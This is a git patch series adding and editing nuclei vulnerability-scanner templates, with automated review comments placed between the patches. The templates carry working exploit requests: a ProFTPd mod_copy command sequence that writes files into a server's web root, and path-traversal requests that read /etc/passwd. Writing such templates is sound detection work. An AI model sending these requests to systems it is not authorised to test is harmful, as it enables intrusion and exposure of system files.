From ec845a16df1eb03198f51164c0a0a5bf0ce7b3c3 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Wed, 24 Feb 2021 05:13:48 +0700
Subject: [PATCH 01/17] :fire: Add CVE-2015-3306
---
cves/2015/CVE-2015-3306.yaml | 27 +++++++++++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 cves/2015/CVE-2015-3306.yaml
diff --git a/cves/2015/CVE-2015-3306.yaml b/cves/2015/CVE-2015-3306.yaml
new file mode 100644
index 0000000000..d12eef18c2
--- /dev/null
+++ b/cves/2015/CVE-2015-3306.yaml
@@ -0,0 +1,27 @@
+id: CVE-2015-3306
+
+info:
+ name: ProFTPd RCE
+ author: pd-team
+ severity: high
+ reference: https://github.com/t0kx/exploit-CVE-2015-3306
+ tags: cve,cve2015,ftp,rce
+
+network:
+ - inputs:
+ - data: "site cpfr /proc/self/cmdline\r\n"
+ read: 1024
+ - data: "site cpto /tmp/.{{randstr}}\r\n"
+ read: 1024
+ - data: "site cpfr /tmp/.{{randstr}}\r\n"
+ read: 1024
+ - data: "site cpto /var/www/html/{{randstr}}\r\n"
+ host:
+ - "{{Hostname}}"
+ # port:
+ # - 21
+ read-size: 1024
+ matchers:
+ - type: word
+ words:
+ - "Copy successful"
\ No newline at end of file
From ad8ebf7f0a6d490fc2c87439269a3ff122a778d7 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+bauthard@users.noreply.github.com>
Date: Thu, 25 Feb 2021 21:35:18 +0530
Subject: [PATCH 02/17] Adding CVE-2018-18778
---
cves/2018/CVE-2018-18778.yaml | 24 ++++++++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 cves/2018/CVE-2018-18778.yaml
diff --git a/cves/2018/CVE-2018-18778.yaml b/cves/2018/CVE-2018-18778.yaml
new file mode 100644
index 0000000000..59a103811e
--- /dev/null
+++ b/cves/2018/CVE-2018-18778.yaml
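Review bot: The last input, `site cpto /var/www/html/{{randstr}}`, copies a file into the target's web root and the earlier `cpto /tmp/.{{randstr}}` leaves a second artifact, yet nothing in the template removes either or marks the check as modifying the target, so operators get no warning before running it against production hosts. The `tags` line should carry a marker for that (e.g. `tags: cve,cve2015,ftp,rce,intrusive`) and `info` a `description` stating which files are left behind. The `# port:` / `# - 21` lines are commented out, so the template only reaches the service when the input already carries the FTP port; that precondition belongs in the same `description` rather than in a dead comment. A one-line comment on which response the `Copy successful` word is expected in (the three `read: 1024` inputs versus the final `read-size: 1024`) would also help whoever tunes this later.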
@@ -0,0 +1,24 @@ +id: CVE-2018-18778 + +info: + name: mini_httpd Path Traversal + author: dhiyaneshDK + severity: high + reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ + tags: cve,cve2018,lfi +requests: + - raw: + - |+ + GET /etc/passwd HTTP/1.1 + Host: + Content-Length: 4 + + unsafe: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" From ea0efacb13fb427b5cdac35e7cc48b5d539352aa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Feb 2021 16:06:02 +0000 Subject: [PATCH 03/17] Auto Update README [Thu Feb 25 16:06:02 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 33d51dc616..699830976b 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 206 | vulnerabilities | 98 | exposed-panels | 74 | +| cves | 207 | vulnerabilities | 98 | exposed-panels | 74 | | exposures | 55 | technologies | 46 | misconfiguration | 48 | | workflows | 21 | miscellaneous | 13 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 603 files**. +**62 directories, 604 files**. From 13155a5e705057306e678d8ff6f2baefc298bad4 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:10:42 +0000 Subject: [PATCH 04/17] Create circleci-config.yaml --- exposures/configs/circleci-config.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/configs/circleci-config.yaml 
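Review bot: The raw request is declared with `|+`, which keeps every trailing newline of the block, and `unsafe: true` sends those bytes verbatim, so the number of blank lines after `Content-Length: 4` is part of the probe and is exactly what a routine YAML reformat or trailing-whitespace cleanup will destroy. A comment above `- raw:` saying that the header set and the trailing newlines are deliberate and must be preserved would protect the template. The `Host:` header also appears here with no value; if an empty Host is intended (the later CVE-2008-2650 change in this series adds `Host: {{Hostname}}` to its raw request), that should be stated in the same comment so it is not "fixed" by a later contributor.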
diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml new file mode 100644 index 0000000000..bd3b8c8df1 --- /dev/null +++ b/exposures/configs/circleci-config.yaml @@ -0,0 +1,25 @@ +id: circleci-config + +info: + name: circleci config.yml exposure + author: geeknik + severity: medium + reference: https://circleci.com/docs/2.0/sample-config/ + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/config.yml" + - "{{BaseURL}}/.circleci/config.yml" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'regex("^version: ", body) && contains(body, "jobs:") == true' + + - type: status + status: + - 200 From 223d3903886167c1c3cb7190bdbfeb22e222d8d5 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:15:59 +0000 Subject: [PATCH 05/17] Update circleci-config.yaml Changing severity from medium to low. --- exposures/configs/circleci-config.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml index bd3b8c8df1..4c5593a45a 100644 --- a/exposures/configs/circleci-config.yaml +++ b/exposures/configs/circleci-config.yaml @@ -3,7 +3,7 @@ id: circleci-config info: name: circleci config.yml exposure author: geeknik - severity: medium + severity: low reference: https://circleci.com/docs/2.0/sample-config/ requests: From 0bfb348b744173a0eb11ed6786786f70467fbaf5 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:40:04 +0000 Subject: [PATCH 06/17] Create circleci-ssh-config.yaml --- exposures/configs/circleci-ssh-config.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/configs/circleci-ssh-config.yaml diff --git a/exposures/configs/circleci-ssh-config.yaml b/exposures/configs/circleci-ssh-config.yaml new file mode 100644 index 0000000000..59e81e5ea9 
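Review bot: `regex("^version: ", body)` anchors at the start of the whole response body (Go's regexp treats `^` as start-of-text unless multiline mode is enabled), so an exposed config.yml that begins with `---` or a comment line is never matched. Either enable multiline mode, `- 'regex("(?m)^version: ", body) && contains(body, "jobs:")'`, or drop the anchor; the `== true` on `contains(...)` is redundant since the function already yields a boolean. `info` also has no `tags` entry, unlike the CVE templates in this series, so the template cannot be selected by tag-based runs.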
--- /dev/null +++ b/exposures/configs/circleci-ssh-config.yaml @@ -0,0 +1,25 @@ +id: circleci-ssh-config + +info: + name: circleci ssh-config exposure + author: geeknik + severity: low + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/.circleci/ssh-config" + + matchers-condition: and + matchers: + - type: word + words: + - "Host" + - "HostName" + - "IdentityFile" + + - type: status + status: + - 200 From 70f3204d5390099cbde5786558f69afc6821186d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:40:35 +0000 Subject: [PATCH 07/17] Update circleci-config.yaml --- exposures/configs/circleci-config.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml index 4c5593a45a..294bb13505 100644 --- a/exposures/configs/circleci-config.yaml +++ b/exposures/configs/circleci-config.yaml @@ -11,7 +11,6 @@ requests: redirects: true max-redirects: 3 path: - - "{{BaseURL}}/config.yml" - "{{BaseURL}}/.circleci/config.yml" matchers-condition: and From 52c05621560dc807b36be4c2cf8b092911e74422 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 14:30:35 +0700 Subject: [PATCH 08/17] :hammer: Move port inside host --- cves/2015/CVE-2015-3306.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/cves/2015/CVE-2015-3306.yaml b/cves/2015/CVE-2015-3306.yaml index d12eef18c2..3de158bcb7 100644 --- a/cves/2015/CVE-2015-3306.yaml +++ b/cves/2015/CVE-2015-3306.yaml @@ -17,9 +17,7 @@ network: read: 1024 - data: "site cpto /var/www/html/{{randstr}}\r\n" host: - - "{{Hostname}}" - # port: - # - 21 + - "{{Hostname}}:21" read-size: 1024 matchers: - type: word From f20adaf50486dd2c153d03733d123cbc68fbdd29 Mon Sep 17 00:00:00 2001 
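Review bot: The `words` matcher sets no `condition`, and nuclei's documented default is `or`, so any one listed word suffices; since `Host` is a substring of `HostName`, the list effectively fires on any 200 response containing `Host`, which is common in ordinary HTML and error pages. Add `condition: and` under the list and consider dropping `Host`, which `HostName` already covers. As with the circleci-config template earlier in the series, `info` carries neither `reference` nor `tags`; a `tags` line keeps the template selectable and a `reference` records what the ssh-config artifact is.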
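Review bot: Replacing `"{{Hostname}}"` with `"{{Hostname}}:21"` appends the port to whatever `Hostname` expands to; if an input is given as host:port and `Hostname` keeps that port, the result is host:port:21 and the connection fails, so the template presumably now only works for bare hostnames. Keeping both entries, `- "{{Hostname}}"` and `- "{{Hostname}}:21"`, covers both input forms at the cost of one extra connection attempt, and a comment on the `host:` list saying why both are present would stop a later cleanup from removing one.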
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 10 Mar 2021 09:18:54 +0000 Subject: [PATCH 09/17] Update CVE-2008-2650.yaml --- cves/2008/CVE-2008-2650.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml index aa427af7be..68b9e4ba42 100644 --- a/cves/2008/CVE-2008-2650.yaml +++ b/cves/2008/CVE-2008-2650.yaml @@ -9,6 +9,7 @@ requests: - raw: - | GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers-condition: and From 0b1e21dddb83ca2729d67f77f39e8d41e4bf0e1c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 18:14:19 +0530 Subject: [PATCH 10/17] syntax update --- fuzzing/iis-shortname.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 1a2db42b20..3c3c4a7e28 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -46,8 +46,8 @@ requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 + req-condition: true matchers: - type: dsl - name: iis-scan dsl: - "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404" From 01e25a5d1e1aa8070ae52e2be19cd7642ed24bfe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 13:47:27 +0000 Subject: [PATCH 11/17] Auto Update README [Thu Mar 11 13:47:27 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 37d784efe8..b4ba60dc51 100644 --- a/README.md +++ b/README.md 
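Review bot: The added `req-condition: true` enables cross-request DSL evaluation, and the matcher directly below it references `status_code_1` through `status_code_4`, which are presumably positional indices into the raw requests defined above this hunk (the enclosing request block starts outside it); that coupling to request order and count is invisible at the matcher, so a short comment above `req-condition: true` naming which request each index refers to would help maintainers. The same `req-condition: true` line is added in patch 12 to CVE-2019-11869.yaml, identityguard-selfservice-entrust.yaml and put-method-enabled.yaml without such a note. The expression also mixes `status_code_1!=404` with `status_code_2 == 404`; consistent spacing and explicit grouping, `(status_code_1 != 404 && status_code_2 == 404) || (status_code_3 != 404 && status_code_4 == 404)`, make the intended precedence obvious. Dropping `name: iis-scan` also removes the matcher name from result output, which is worth a line in the commit message if anything downstream filtered on it.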
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | -| exposures | 61 | technologies | 50 | misconfiguration | 54 | +| exposures | 62 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 712 files**. +**75 directories, 713 files**. From d3ee173adeeff3ab3cd6d5f483f01bd88ced3999 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 19:47:22 +0530 Subject: [PATCH 12/17] Adding updated syntax --- cves/2019/CVE-2019-11869.yaml | 1 + exposed-panels/identityguard-selfservice-entrust.yaml | 1 + misconfiguration/put-method-enabled.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml index 27c0bf4a94..8a92db1344 100644 --- a/cves/2019/CVE-2019-11869.yaml +++ b/cves/2019/CVE-2019-11869.yaml @@ -33,6 +33,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Upgrade-Insecure-Requests: 1 + req-condition: true matchers-condition: and matchers: - type: dsl diff --git a/exposed-panels/identityguard-selfservice-entrust.yaml b/exposed-panels/identityguard-selfservice-entrust.yaml index 771b21408a..a8cfb6d388 100644 --- a/exposed-panels/identityguard-selfservice-entrust.yaml +++ b/exposed-panels/identityguard-selfservice-entrust.yaml @@ -11,6 +11,7 @@ requests: - "{{BaseURL}}/IdentityGuardSelfService/" - "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico" + req-condition: true redirects: true max-redirects: 2 matchers: 
diff --git a/misconfiguration/put-method-enabled.yaml b/misconfiguration/put-method-enabled.yaml index 33f999e808..1e10bad487 100644 --- a/misconfiguration/put-method-enabled.yaml +++ b/misconfiguration/put-method-enabled.yaml @@ -19,6 +19,7 @@ requests: GET /testing-put.txt HTTP/1.1 Content-Type: text/plain + req-condition: true matchers: - type: dsl name: multi-req From ff4df95a5ee4a9e185aa413363dd47244cad9786 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 11 Mar 2021 14:29:16 +0000 Subject: [PATCH 13/17] Update circleci-ssh-config.yaml --- exposures/configs/circleci-ssh-config.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/circleci-ssh-config.yaml b/exposures/configs/circleci-ssh-config.yaml index 59e81e5ea9..2d6eb7e18a 100644 --- a/exposures/configs/circleci-ssh-config.yaml +++ b/exposures/configs/circleci-ssh-config.yaml @@ -19,6 +19,7 @@ requests: - "Host" - "HostName" - "IdentityFile" + condition: and - type: status status: From b32604fe6dbdc7bd170a626ac968d3df06dfe792 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 14:32:04 +0000 Subject: [PATCH 14/17] Auto Update README [Thu Mar 11 14:32:03 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b4ba60dc51..d73c7cc75c 100644 --- a/README.md +++ b/README.md 
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | -| exposures | 62 | technologies | 50 | misconfiguration | 54 | +| exposures | 63 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 713 files**. +**75 directories, 714 files**. From 29d52ecc58de155c31e9401b4f11f40589d5104e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 15:08:44 +0000 Subject: [PATCH 15/17] Auto Update README [Thu Mar 11 15:08:44 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d73c7cc75c..a8323e802b 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | +| cves | 236 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 63 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 714 files**. +**75 directories, 715 files**. From 80ef150bb77ceadeff9021627b9c0c36b83ad6bd Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 20:44:26 +0530 Subject: [PATCH 16/17] Update CVE-2015-3306.yaml --- cves/2015/CVE-2015-3306.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2015/CVE-2015-3306.yaml b/cves/2015/CVE-2015-3306.yaml index d12eef18c2..82458684b3 100644 --- a/cves/2015/CVE-2015-3306.yaml +++ b/cves/2015/CVE-2015-3306.yaml @@ -5,7 +5,7 @@ info: author: pd-team severity: high reference: https://github.com/t0kx/exploit-CVE-2015-3306 - tags: cve,cve2015,ftp,rce + tags: cve,cve2015,ftp,rce,network network: - inputs: @@ -18,10 +18,10 @@ network: - data: "site cpto /var/www/html/{{randstr}}\r\n" host: - "{{Hostname}}" - # port: - # - 21 + read-size: 1024 matchers: - type: word words: - - "Copy successful" \ No newline at end of file + - "Copy successful" + part: raw \ No newline at end of file From 6469f38cf49e2593c511f7fa494104d90d69efad Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 15:16:36 +0000 Subject: [PATCH 17/17] Auto Update README [Thu Mar 11 15:16:36 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a8323e802b..1ed2f0d10a 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 236 | vulnerabilities | 105 | exposed-panels | 104 | +| cves | 237 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 63 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 715 files**. +**75 directories, 716 files**.
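Review bot: The second hunk is generated against blob `d12eef18c2` (the file as created in patch 01) and still shows `- "{{Hostname}}"` as context, but patch 08 of this series has already changed that line to `"{{Hostname}}:21"` and deleted the same `# port:` / `# - 21` comment lines, so applied in order this patch will not apply cleanly, and if the conflict is resolved by taking this side the explicit port is silently lost and the template depends on the input carrying it. The series should be rebased so this hunk is against `3de158bcb7` and keeps the port. Adding `part: raw` to the `Copy successful` matcher is the right fix for a network response and needs no change.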